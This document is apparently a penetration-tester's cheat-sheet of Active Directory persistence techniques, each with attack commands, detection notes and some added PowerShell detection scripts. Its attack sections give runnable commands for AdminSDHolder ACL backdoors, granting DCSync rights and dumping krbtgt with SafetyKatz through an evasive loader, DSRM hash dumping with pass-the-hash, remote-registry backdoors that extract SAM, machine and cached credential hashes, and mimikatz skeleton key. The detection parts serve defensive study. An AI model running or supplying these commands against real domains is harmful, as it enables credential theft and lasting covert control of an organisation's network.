
persist / ad

Techniques detailed at thehacker.recipes / ad / persistence


adminsdholder

🔑 KEYPOINTS :

  • AdminSDHolder is a container (CN=AdminSDHolder,CN=System) whose security descriptor is used as the template for the protected AD accounts and groups (Domain Admins, Enterprise Admins, Administrators, Account/Backup/Server/Print Operators, krbtgt, ...)
  • every 60 minutes by default, the Security Descriptor Propagator (SDProp) process on the PDC emulator overwrites the DACL of every protected object with the AdminSDHolder template and stamps it with adminCount=1; an ACE added to AdminSDHolder therefore reappears on Domain Admins even after being cleaned from the group itself

▶️ PLAY :

# grant the user an ACE on the AdminSDHolder object itself (old PowerView syntax); pick one: full control, or only the right you need
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName $ztarg_user_name -Verbose -Rights All
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName $ztarg_user_name -Verbose -Rights ResetPassword
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName $ztarg_user_name -Verbose -Rights WriteMembers

# once SDProp has run (up to 60 minutes later), check that the ACE was propagated to the 'Domain Admins' group
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match $ztarg_user_name}

# the propagated ACE (GenericAll / WriteMembers) lets the user add himself back to 'Domain Admins' every time he is removed
net group "domain admins" $ztarg_user_name /add /domain
Add-DomainGroupMember -Identity "domain admins" -Domain $zdom_fqdn -Members $ztarg_user_name

🔎️ DETECT :

# find all users and groups whose ACL was stamped by SDProp (adminCount=1) with the ActiveDirectory module; the LDAP filter must be quoted or PowerShell parses the parentheses
Import-Module ActiveDirectory
Get-ADObject -LDAPFilter "(&(adminCount=1)(|(objectCategory=person)(objectCategory=group)))" -Properties MemberOf,Created,Modified,AdminCount

# monitor the ACL of the AdminSDHolder object itself. It should stay at the default: it is rarely necessary to add other principals to it, so any new ACE is a strong signal.

# monitor users and groups with adminCount=1 to identify objects whose ACL was set by SDProp. adminCount is never reset when an object leaves a protected group, so adminCount=1 objects that are no longer members of any protected group are worth reviewing too (they keep the locked-down DACL and do not inherit permissions).
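The two monitoring points above as one ActiveDirectory-module script, added here as an example that is not part of the original page or of thehacker.recipes: it lists explicit write-class ACEs on AdminSDHolder held by principals outside a baseline, and adminCount=1 objects that are no longer transitive members of any protected group. The baseline trustee list and the protected-group list are assumptions for a default forest; replace them with an export taken from a known-good domain.

```powershell
Import-Module ActiveDirectory

# Principals expected to hold explicit ACEs on AdminSDHolder in a default forest.
# ASSUMPTION: tune this from a known-good export of your own domain.
$BaselineTrustees = @(
    'SYSTEM', 'SELF', 'Authenticated Users', 'Everyone',
    'Administrators', 'Domain Admins', 'Enterprise Admins', 'Cert Publishers',
    'Pre-Windows 2000 Compatible Access', 'Windows Authorization Access Group',
    'Terminal Server License Servers'
)

# Groups whose (transitive) members SDProp stamps with adminCount=1.
# ASSUMPTION: default set; add any group you have added to the protected set.
$ProtectedGroups = @(
    'Administrators', 'Account Operators', 'Backup Operators', 'Print Operators',
    'Server Operators', 'Replicator', 'Domain Admins', 'Domain Controllers',
    'Read-only Domain Controllers', 'Enterprise Admins', 'Schema Admins'
)

# Rights that let the holder modify the object. Through SDProp, such an ACE on
# AdminSDHolder becomes the same ACE on every protected user and group.
$WriteRights = 'GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty|ExtendedRight|Self|CreateChild|DeleteChild'

function Get-AdminSDHolderSuspiciousAce {
    param([string[]]$Baseline = $BaselineTrustees)
    $domain = Get-ADDomain
    $acl = Get-Acl -Path "AD:\CN=AdminSDHolder,CN=System,$($domain.DistinguishedName)"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        # Strip "DOMAIN\" so the baseline works for the local and the forest-root domain alike
        $account = $ace.IdentityReference.Value -replace '^.*\\', ''
        if ($Baseline -contains $account) { continue }
        if ($ace.ActiveDirectoryRights.ToString() -notmatch $WriteRights) { continue }
        [pscustomobject]@{
            Trustee    = $ace.IdentityReference.Value
            Rights     = $ace.ActiveDirectoryRights.ToString()
            ObjectType = $ace.ObjectType    # property/extended-right GUID; all-zero GUID = whole object
            Inherited  = $ace.IsInherited
        }
    }
}

function Get-OrphanedAdminCountObject {
    # SDProp never clears adminCount when an object leaves a protected group, so these
    # objects keep the locked-down DACL and still look "protected" to most tooling.
    $protected = @{}
    foreach ($name in $ProtectedGroups) {
        # Enterprise Admins and Schema Admins only exist in the forest-root domain
        $group = Get-ADGroup -LDAPFilter "(sAMAccountName=$name)" -ErrorAction SilentlyContinue
        if (-not $group) { continue }
        $protected[$group.DistinguishedName] = $true
        Get-ADGroupMember -Identity $group -Recursive -ErrorAction SilentlyContinue |
            ForEach-Object { $protected[$_.DistinguishedName] = $true }
    }
    Get-ADObject -LDAPFilter '(&(adminCount=1)(|(objectCategory=person)(objectCategory=group)))' `
                 -Properties adminCount, whenChanged |
        Where-Object { -not $protected.ContainsKey($_.DistinguishedName) -and $_.Name -ne 'krbtgt' } |
        Select-Object Name, ObjectClass, whenChanged, DistinguishedName
}

Get-AdminSDHolderSuspiciousAce | Format-Table -AutoSize
Get-OrphanedAdminCountObject   | Format-Table -AutoSize
```

The ACE check strips the domain prefix before comparing with the baseline because Enterprise Admins is prefixed with the forest-root NetBIOS name, not the current domain's. Run it as any domain user for the ACL part; the orphan part only needs read access to group membership.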

🛟 MITIGATE :

🕮 READ MORE at :

dacl-abuse

🔑 KEYPOINTS :

genericall

▶️ PLAY :

######         DCSYNC               #############
# 01 # as DA add dcsync rights to a low-level user
# i.e. the 'Replicating Directory Changes' and 'Replicating Directory Changes All' extended rights on the domain object (the domain naming context); PowerView's -Rights DCSync adds both plus 'Replicating Directory Changes In Filtered Set'
Add-DomainObjectAcl -TargetIdentity $zdom_dn -PrincipalIdentity $ztarg_user_name -Rights DCSync -PrincipalDomain $zdom_fqdn -TargetDomain $zdom_fqdn -Verbose
# 02 # run a DCSync as the low-level user; krbtgt gives a golden ticket, but any account can be dumped
$znbss = ""                 # NetBIOS name of the domain (fill in; it is not necessarily the first label of $zdom_fqdn)
$zsync_user = "krbtgt"      # separate from $ztarg_user_name, which still holds the low-level user from step 01
$zx = $znbss + "\" + $zsync_user
# $args is a PowerShell automatic variable, so the mimikatz command line goes in a dedicated one
$zargs = '"lsadump::evasive-dcsync /user:' + $zx + '" "exit"'
.\Loader.exe -path .\SafetyKatz.exe -args $zargs

🔎️ DETECT :
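Detection for the DCSync play above, as an added example that is not part of the original page: Security event 4662 records the replication extended rights (DS-Replication-Get-Changes, -All, -In-Filtered-Set) being exercised on the domain naming context, and a DCSync is simply a 4662 whose subject is not a domain controller (or another vetted replicator, such as an Azure AD Connect MSOL_ account). The function takes the event as XML so it runs on the constructed sample events below and, in production, on Get-WinEvent output; "Audit Directory Service Access" with a SACL on the domain root for these rights must be enabled, otherwise 4662 is never written. The sample events, the domain name and the allow list are constructed for the example.

```powershell
# Extended-right GUIDs whose presence in the 4662 "Properties" field means replication
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function Test-DcSyncEvent {
    param(
        [Parameter(Mandatory)][xml]$EventXml,
        # Accounts allowed to replicate: DC machine accounts (NAME$) plus any known sync account
        [string[]]$AllowedReplicators
    )
    $data = @{}
    foreach ($d in $EventXml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    # 0x100 = Control Access, the only access mask used for extended rights
    if ($data['AccessMask'] -ne '0x100') { return $null }
    $hits = @($ReplicationRights.Keys | Where-Object { $data['Properties'] -match $_ })
    if ($hits.Count -eq 0) { return $null }
    [pscustomobject]@{
        TimeCreated = $EventXml.Event.System.TimeCreated.SystemTime
        Subject     = '{0}\{1}' -f $data['SubjectDomainName'], $data['SubjectUserName']
        Object      = $data['ObjectName']
        Rights      = ($hits | ForEach-Object { $ReplicationRights[$_] }) -join ', '
        # Replication by anything other than a DC (or a vetted sync account) is a DCSync
        Suspicious  = ($AllowedReplicators -notcontains $data['SubjectUserName'])
    }
}

# Constructed sample events (not real log data): a DC replicating, then a user DCSyncing
$Samples = @(
@'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID>4662</EventID><TimeCreated SystemTime="2024-05-01T10:00:00Z"/></System><EventData><Data Name="SubjectUserName">DC02$</Data><Data Name="SubjectDomainName">CORP</Data><Data Name="ObjectType">%{19195a5b-6da0-11d0-afd3-00c04fd930c9}</Data><Data Name="ObjectName">%{d3e8c1f0-1111-2222-3333-444444444444}</Data><Data Name="AccessMask">0x100</Data><Data Name="Properties">%%7688
{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}
{19195a5b-6da0-11d0-afd3-00c04fd930c9}</Data></EventData></Event>
'@,
@'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID>4662</EventID><TimeCreated SystemTime="2024-05-01T10:05:00Z"/></System><EventData><Data Name="SubjectUserName">spotless</Data><Data Name="SubjectDomainName">CORP</Data><Data Name="ObjectType">%{19195a5b-6da0-11d0-afd3-00c04fd930c9}</Data><Data Name="ObjectName">%{d3e8c1f0-1111-2222-3333-444444444444}</Data><Data Name="AccessMask">0x100</Data><Data Name="Properties">%%7688
{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
{19195a5b-6da0-11d0-afd3-00c04fd930c9}</Data></EventData></Event>
'@
)

# Constructed allow list; in production build it from (Get-ADDomainController -Filter *).Name plus "$"
$allowed = @('DC01$', 'DC02$')
$Samples | ForEach-Object { Test-DcSyncEvent -EventXml ([xml]$_) -AllowedReplicators $allowed } |
    Where-Object Suspicious | Format-Table -AutoSize

# Production: Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4662} |
#             ForEach-Object { Test-DcSyncEvent ([xml]$_.ToXml()) $allowed } | Where-Object Suspicious
```

Only the second sample is reported. Matching on the GUIDs rather than on the localized right names keeps the rule language-independent, and keying the allow list on the subject account (not on the source IP) still works when the attacker runs the DCSync from a DC he has already compromised.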

🛟 MITIGATE :

# other GenericAll abuses
# on a group: add a user to the (privileged) group
# on a user or computer: shadow credentials, i.e. write a key to its msDS-KeyCredentialLink attribute and authenticate as it with PKINIT

genericwrite

######         DCSYNC               #############

🕮 READ MORE at :

dc-shadow

🔑 KEYPOINTS :

  • tbd

▶️ PLAY :

🔎️ DETECT :

🛟 MITIGATE :

🕮 READ MORE at :

dsrm

🔑 KEYPOINTS :

  • DSRM stands for 'Directory Services Restore Mode'; its Administrator account is the DC's local (SAM) Administrator, whose password is set at promotion and rarely changed afterwards
  • by default that account can only log on in DSRM; setting the registry value DsrmAdminLogonBehavior to 2 lets it log on over the network while AD is running (1 = only while the AD DS service is stopped)
  • requires dumping its NT hash from the DC's SAM (DA/SYSTEM on the DC) and flipping the registry value; the hash is local to the DC and survives Domain Admin password changes and krbtgt resets

▶️ PLAY :

# 01 # on the DC, dump the local SAM (lsadump::sam reads the registry hives, not LSASS): the Administrator NT hash is $zdom_dc_admin_nthash
C:\Users\Public\Loader.exe -path .\SafetyKatz.exe -args "token::elevate" "lsadump::evasive-sam" "exit"

# 020 # check whether the value exists and read it (absent or 0 = DSRM only; 1 = when the AD DS service is stopped; 2 = always)
Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name DsrmAdminLogonBehavior -ErrorAction SilentlyContinue

# 021 # create the value with "2" if it doesn't exist
New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name DsrmAdminLogonBehavior -Value 2 -PropertyType DWORD

# 022 # or change an existing value to "2"
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name DsrmAdminLogonBehavior -Value 2

# 03 # pass-the-hash with $zdom_dc_admin_nthash. The DSRM account is local to the DC, so /domain is the DC's hostname, not the AD domain; the spawned cmd.exe can then reach \\$zdom_dc_name\c$ or run a DCSync against that DC
C:\Users\Public\Loader.exe -path .\SafetyKatz.exe -args "sekurlsa::evasive-pth /domain:${zdom_dc_name} /user:Administrator /ntlm:${zdom_dc_admin_nthash} /run:cmd.exe" "exit"

🔎️ DETECT :

# EID: 4657 - registry value modified (needs object-access auditing plus a SACL on HKLM\SYSTEM\CurrentControlSet\Control\Lsa)
# EID: 13 - registry value set (Sysmon); EID 12 only covers key creation/deletion, so alert on 13 for DsrmAdminLogonBehavior
# EID: 4624 - network logon (type 3) on a DC for user 'Administrator' whose account domain is the DC's own hostname, which only succeeds once DSRM network logon is enabled

🛟 MITIGATE :

🕮 READ MORE at :

golden-gmsa

🔑 KEYPOINTS :

  • Group Managed Service Accounts (gMSA) are service accounts whose password is managed by AD itself: 240 random characters, rotated every 30 days by default, and retrievable only by the principals listed in msDS-GroupMSAMembership
  • the password is not stored: it is derived from a KDS root key (msKds-ProvRootKey, readable only by Domain/Enterprise Admins and SYSTEM on a DC) together with the gMSA's SID and its msDS-ManagedPasswordId, and exposed through the constructed attribute msDS-ManagedPassword
  • Golden gMSA: an attacker who has dumped a KDS root key once can compute the current and every future password of any gMSA in the forest offline, without touching a DC again; implemented by the Semperis GoldenGMSA tool (gmsainfo, kdsinfo, compute)

▶️ PLAY :

# enumerate the gMSAs of the domain: SAM account name, SID, the RootKeyGuid of the KDS root key in use and the password ID (msDS-ManagedPasswordId); works as any domain user
GoldenGMSA.exe gmsainfo

# enumeration for a single gMSA, by SID
GoldenGMSA.exe gmsainfo --sid "S-1-5-21-[...]1586295871-1112"

🔎️ DETECT :

🛟 MITIGATE :

🕮 READ MORE at :

security-descriptors

🔑 KEYPOINTS :

▶️ PLAY :

DCOM

# set-RemoteDCOM

Powershell

# grant PS remote execution to a user
Set-RemotePSRemoting -UserName $ztarg_user_name -ComputerName $zdom_dc_name -Verbose

# remove the grant of PS remote execution
Set-RemotePSRemoting -UserName $ztarg_user_name -ComputerName $zdom_dc_name -Verbose -Remove

Registry

# re-ACL the remote-registry pipe key (winreg) and the keys holding the boot key, SAM and SECURITY so the trustee can later remotely retrieve the DC's machine account hash, its local SAM hashes and its domain cached credentials (DAMP); requires admin on the target once
Add-RemoteRegBackdoor -ComputerName $zdom_dc_name -Trustee $ztarg_user_name -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName $zdom_dc_name -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName $zdom_dc_name -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName $zdom_dc_name -Verbose

🔎️ DETECT :

# changes to DC registry key ACLs (explicit, non-inherited ACEs for an unexpected trustee): the remote-registry pipe gate and the four keys whose Class values form the boot key
SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg
SYSTEM\CurrentControlSet\Control\LSA\JD
SYSTEM\CurrentControlSet\Control\LSA\Skew1
SYSTEM\CurrentControlSet\Control\LSA\Data
SYSTEM\CurrentControlSet\Control\LSA\GBG
# plus the SAM and SECURITY hives, which the backdoor also opens up; EID 4670 (permissions on an object were changed) fires for each key if object-access auditing with a SACL is on
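Added example, not from the original page nor from DAMP, that turns the registry indicators of the DSRM and security-descriptors sections into one check to run on a DC, locally or through Invoke-Command: it reads DsrmAdminLogonBehavior and lists explicit (non-inherited) Allow ACEs on the winreg pipe key, the four boot-key keys, SAM and SECURITY for trustees outside a baseline. The baseline list is an assumption for a default DC; diff it against a freshly promoted DC before trusting it. Run elevated: reading the SAM/SECURITY DACLs requires Administrators.

```powershell
function Get-DcRegistryPersistence {
    param(
        # Trustees that may hold explicit ACEs on these keys by default.
        # ASSUMPTION: taken from a default DC; verify against a known-good one.
        [string[]]$BaselineTrustees = @(
            'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'BUILTIN\Backup Operators',
            'NT AUTHORITY\LOCAL SERVICE', 'CREATOR OWNER'
        )
    )
    $lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $findings = New-Object System.Collections.Generic.List[object]

    # 1. DSRM: absent or 0 = DSRM Administrator usable only in DSRM; 1 = also when AD DS is stopped;
    #    2 = always, i.e. network logon / PTH with the DC's local Administrator hash works
    $dsrm = (Get-ItemProperty -Path $lsa -Name DsrmAdminLogonBehavior -ErrorAction SilentlyContinue).DsrmAdminLogonBehavior
    if ($null -ne $dsrm -and $dsrm -ne 0) {
        $findings.Add([pscustomobject]@{ Check = 'DsrmAdminLogonBehavior'; Key = $lsa; Detail = "value is $dsrm" })
    }

    # 2. Keys whose DACL Add-RemoteRegBackdoor opens: the remote-registry pipe gate, the four keys
    #    whose Class values form the boot key, and the two hives that boot key decrypts
    $keys = @(
        'HKLM:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg',
        "$lsa\JD", "$lsa\Skew1", "$lsa\Data", "$lsa\GBG",
        'HKLM:\SAM', 'HKLM:\SECURITY'
    )
    foreach ($key in $keys) {
        $acl = Get-Acl -Path $key -ErrorAction SilentlyContinue
        if (-not $acl) {
            $findings.Add([pscustomobject]@{ Check = 'ACL unreadable (not elevated?)'; Key = $key; Detail = '' })
            continue
        }
        foreach ($ace in $acl.Access) {
            # A backdoor is an explicit Allow ACE for a principal that has no business on the key;
            # inherited ACEs come from the parent and are reviewed there
            if ($ace.AccessControlType -ne 'Allow' -or $ace.IsInherited) { continue }
            if ($BaselineTrustees -contains $ace.IdentityReference.Value) { continue }
            $findings.Add([pscustomobject]@{
                Check  = 'Unexpected explicit ACE'
                Key    = $key
                Detail = '{0}: {1}' -f $ace.IdentityReference.Value, $ace.RegistryRights
            })
        }
    }
    $findings
}

# Locally on the DC
Get-DcRegistryPersistence | Format-Table -AutoSize
# From an admin workstation: the function body is shipped to the DC, nothing is installed there
# Invoke-Command -ComputerName $zdom_dc_name -ScriptBlock ${function:Get-DcRegistryPersistence} | Format-Table -AutoSize
```

A trustee on winreg that is neither Administrators, Backup Operators nor LOCAL SERVICE, or any explicit ACE at all for a domain user on JD/Skew1/Data/GBG, is the DAMP pattern; the same check catches hand-made variants since it keys on the trustee, not on the tool.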

SC Manager

WMI

# grant WMI remote execution to a user
Set-RemoteWMI -UserName $ztarg_user_name -ComputerName $zdom_dc_name -namespace 'root\cimv2' -Verbose

# remove the grant of WMI remote execution
Set-RemoteWMI -UserName $ztarg_user_name -ComputerName $zdom_dc_name -namespace 'root\cimv2' -Remove -Verbose

🕮 READ MORE at :

skeleton-key

🔑 KEYPOINTS :

  • patches the LSASS process on a DC so that a master password ("mimikatz" by default) is accepted for every account alongside the real one
  • lets the adversary authenticate as any user (NTLM, or Kerberos with RC4) without knowing the password; the real password keeps working, so users notice nothing
  • lives only in memory and does not survive a reboot of the DC; has to be injected on every DC the targets may authenticate against

▶️ PLAY :

# execution on each DC (DA with SeDebugPrivilege; re-run after every reboot)
invoke-mimi 'misc::skeleton'

🔎️ DETECT :

# Sysmon EID 10 (ProcessAccess) against lsass.exe on a DC from a process other than the usual system ones; EID 7045 / 4697 if the mimikatz driver (mimidrv) is installed as a service to get past LSA Protection
# RC4 (etype 0x17) in 4768/4769 for accounts that normally use AES: the skeleton key only works when the client falls back to RC4

🛟 MITIGATE :

# LSA Protection (RunAsPPL) on DCs raises the bar, since injecting into lsass then needs a signed driver; restrict and monitor DA logons to DCs

🕮 READ MORE at :

ssp-custom